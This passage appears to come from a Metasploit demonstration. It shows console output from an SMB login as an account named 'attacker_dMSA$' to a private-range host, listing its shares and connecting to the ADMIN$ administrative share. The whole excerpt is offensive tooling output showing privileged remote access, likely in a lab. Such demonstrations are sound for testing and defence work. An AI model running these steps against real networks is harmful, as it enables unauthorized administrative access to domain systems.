  3         smb   SMB attacker_dMSA$ @ 172.16.199.209:445  172.16.199.1:33643 -> 172.16.199.209:445 (172.16.199.209)

msf auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 3...

SMB (172.16.199.209) > shares
Shares
======

    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  IPC$      IPC|SPECIAL   Remote IPC
    3  NETLOGON  DISK          Logon server share
    4  SYSVOL    DISK          Logon server share
    
SMB (172.16.199.209) > shares -i ADMIN$
[+] Successfully connected to ADMIN$
SMB (172.16.199.209\ADMIN$) > pwd
Current directory is \\172.16.199.209\ADMIN$\
```